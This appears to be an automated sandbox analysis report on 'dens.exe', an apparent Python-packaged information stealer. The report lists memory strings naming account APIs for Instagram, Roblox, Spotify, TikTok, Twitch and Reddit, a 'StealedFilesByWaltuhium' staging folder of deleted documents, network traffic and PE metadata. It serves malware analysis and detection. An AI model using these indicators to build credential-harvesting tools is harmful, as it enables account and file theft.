            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hynek.me/articles/import-attrs/)
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/qxnzimj.jpg
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/qxnzimj.jpgp
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC930000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://img.shields.io/pypi/pyversions/backports.tarfile.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/names.html)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: dens.exe, 00000001.00000003.2028227051.000002D9AB446000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038893022.000002D9AB456000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041611631.000002D9AB457000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066912837.000002D9ACD51000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2061658047.000002D9AB45A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1953230654.000002D9AB446000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042317269.000002D9AB459000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037555294.000002D9AB446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: dens.exe, 00000001.00000002.2066912837.000002D9ACD51000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065840067.000002D9AC830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
            Source: dens.exe, 00000001.00000003.2048626589.000002D9AA9FD000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2058173004.000002D9AAA04000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041163716.000002D9AA9CE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2046859632.000002D9AA9FC000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039766959.000002D9AA9C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2049325458.000002D9AA9FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: METADATA14.0.drString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/p
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776400001.000002D9AC1C1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2032462700.000002D9AC1BB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034615706.000002D9AC1D3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profilep
            Source: dens.exe, 00000001.00000003.2032142839.000002D9ABE69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/0
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.variomedia.de/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Users\user\Desktop\dens.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\ONBQCLYSPU.pdf
            Source: C:\Users\user\Desktop\dens.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\VLZDGUKUTZ.jpg
            Source: C:\Users\user\Desktop\dens.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\XZXHAVGRAG.xlsx
            Source: C:\Users\user\Desktop\dens.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\LTKMYBSEYZ.xlsx
            Source: C:\Users\user\Desktop\dens.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\XZXHAVGRAG.docx
            Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: _overlapped.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
            Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666599668.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664725190.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665506325.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1661110438.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs dens.exe
            Source: dens.exe, 00000000.00000003.1663980456.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666519024.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665921025.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664590602.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666061436.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1691107697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663850239.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665572074.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664185093.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs dens.exe
            Source: dens.exe, 00000000.00000003.1665639486.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665989863.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664523044.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665234767.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664254134.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665091592.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665368820.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1665022014.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664318244.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664117143.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664659823.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1665157382.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs dens.exe
            Source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664385796.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663289848.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs dens.exe
